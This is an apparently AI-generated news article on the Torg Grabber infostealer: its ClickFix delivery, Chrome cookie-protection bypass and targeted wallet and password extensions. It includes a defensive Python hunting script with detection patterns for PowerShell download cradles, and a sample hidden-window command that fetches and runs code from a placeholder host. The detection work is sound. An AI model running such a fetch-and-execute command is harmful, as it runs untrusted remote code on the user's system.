

Ethical Hacking News

New Torg Grabber Malware Steals Sensitive Data from 850 Browser Extensions



New Torg Grabber is a highly sophisticated malware campaign that targets 850 browser extensions across multiple platforms, with over 728 of them specifically designed for cryptocurrency wallets. The malware steals sensitive data from these wallets and other storage solutions, including credentials, cookies, and autofill data. Gen Digital researchers have identified several anti-analysis mechanisms and multi-layered obfuscation; the malware also uses direct syscalls and reflective loading for evasion and runs the final payload entirely in memory.


  • Torg Grabber is a highly sophisticated malware campaign targeting cryptocurrency wallets and sensitive data storage solutions.
  • The malware uses the ClickFix technique to hijack the clipboard and trick users into executing a malicious PowerShell command.
  • Torg Grabber can steal credentials, cookies, and autofill data from cryptocurrency wallets and over 103 extensions for passwords, tokens, and authenticators.
  • The malware has added App-Bound Encryption (ABE) bypass to beat Chrome's cookie protection system.
  • Gen Digital warns that Torg Grabber continues to develop rapidly, with new C2 domains registered weekly.
  • Users and organizations must implement robust security measures, stay informed about emerging threats, and utilize reputable antivirus software to protect against Torg Grabber.



    The cybersecurity landscape has recently been hit by a new and highly sophisticated malware campaign known as New Torg Grabber, which has been making headlines for its aggressive targeting of cryptocurrency wallets and other sensitive data storage solutions. According to researchers at Gen Digital, the threat actor behind it is actively developing the malware, with 334 unique samples compiled in just three months (between December 2025 and February 2026) and new command-and-control (C2) servers registered every week.

    The primary entry point for Torg Grabber is through the ClickFix technique, which involves hijacking the clipboard and tricking users into executing a malicious PowerShell command. Once inside, the malware injects a DLL reflectively into the browser to access Chrome’s COM Elevation Service and extract the master encryption key, a method also recently seen in VoidStealer. This allows it to bypass various security measures, including Chrome's cookie protection system.
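One way to hunt for the ClickFix step described above in process-creation telemetry. This is an added example, not code from the article or from Gen Digital; the event field names, the sample events and the indicator patterns are constructed assumptions modeled on Sysmon-style process-creation records.

```python
import re

SHELLS = {"powershell.exe", "pwsh.exe"}
# Parent that indicates a command pasted by the user (e.g. into the Run dialog).
INTERACTIVE_PARENTS = {"explorer.exe"}

# Assumed heuristics for pasted one-liners; tune against local baselines.
INDICATORS = {
    "hidden_window": re.compile(r"-w[a-z]*\s+(hidden|h|1)\b", re.I),
    "encoded_command": re.compile(r"\s-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def score_event(event):
    """Indicator names hit by a shell started from an interactive parent."""
    if basename(event["image"]) not in SHELLS:
        return []
    if basename(event["parent_image"]) not in INTERACTIVE_PARENTS:
        return []
    return [n for n, rx in INDICATORS.items() if rx.search(event["command_line"])]

def hunt(events, threshold=2):
    """Return (host, indicators) for events meeting the indicator threshold."""
    return [(e["host"], hits) for e in events
            if len(hits := score_event(e)) >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events, not taken from the Torg Grabber campaign.
SAMPLE_EVENTS = [
    {"host": "WS-01", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'},
    {"host": "WS-02", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -NoExit -Command "Get-ChildItem C:\Users"'},
    {"host": "SRV-03", "image": PS, "parent_image": r"C:\Program Files\Mgmt\agent.exe",
     "command_line": "powershell.exe -w hidden -enc RwBlAHQALQBEAGEAdABlAA=="},
]

if __name__ == "__main__":
    for host, hits in hunt(SAMPLE_EVENTS):
        print(f"{host}: possible ClickFix paste ({', '.join(hits)})")
```

Only WS-01 is flagged: WS-02 is an interactive shell with no indicators, and SRV-03 is filtered out because its parent is a management agent rather than Explorer.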

    Torg Grabber targets 850 browser extensions across 25 Chromium-based browsers and 8 Firefox variants, with over 728 of them specifically designed for cryptocurrency wallets, covering "essentially every crypto wallet ever conceived by human optimism." The malware can steal credentials, cookies, and autofill data from these wallets, including popular names like MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, and Solflare.

    Apart from cryptocurrency wallets, Torg Grabber also targets a large list of 103 extensions for passwords, tokens, and authenticators: LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass, Psono, Pleasant Password Server, heylogin, 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA. The malware can also profile the host, create a hardware fingerprint, document installed software (including 24 antivirus tools), take screenshots of the user’s desktop, and steal files from the Desktop/Documents folders.

    Furthermore, Torg Grabber has added App-Bound Encryption (ABE) bypass to beat Chrome’s (and Brave's, Edge's, Vivaldi's, and Opera's) cookie protection system, a method also recently seen in other information stealers. The malware features several anti-analysis mechanisms, multi-layered obfuscation, and uses direct syscalls and reflective loading for evasion, running the final payload entirely in memory.

    Gen Digital cautions that Torg Grabber continues to develop rapidly, registering new C2 domains weekly, and that its operator base is expanding, with 40 tags documented by the time of analysis. The researchers also discovered a standalone tool called Underground, which uses a similar approach but focuses more on extracting browser data.

    The recent development and deployment of New Torg Grabber highlight the evolving nature of malware threats in the digital landscape. As security measures become increasingly sophisticated, attackers continually adapt and innovate to stay ahead. It is crucial for users and organizations to remain vigilant and adopt proactive strategies to protect against such threats.

    In response to this new threat, cybersecurity professionals and individuals must be aware of the risks associated with New Torg Grabber and take immediate action to secure their systems and data. This includes implementing robust security measures, staying informed about emerging threats, and utilizing reputable antivirus software to detect and remove malware.

    Furthermore, users should exercise extreme caution when interacting with unfamiliar software or websites, avoiding suspicious links and attachments, and regularly updating their operating systems and applications to ensure they have the latest security patches.

    As the cybersecurity landscape continues to evolve, it is essential for individuals and organizations to remain proactive in protecting themselves against threats like New Torg Grabber. By staying informed, adopting robust security measures, and utilizing reputable antivirus software, users can significantly reduce their risk of falling victim to this or other similar malware campaigns.





  • Published: Wed Mar 25 14:44:00 2026 by llama3.2 3B Q4_K_M












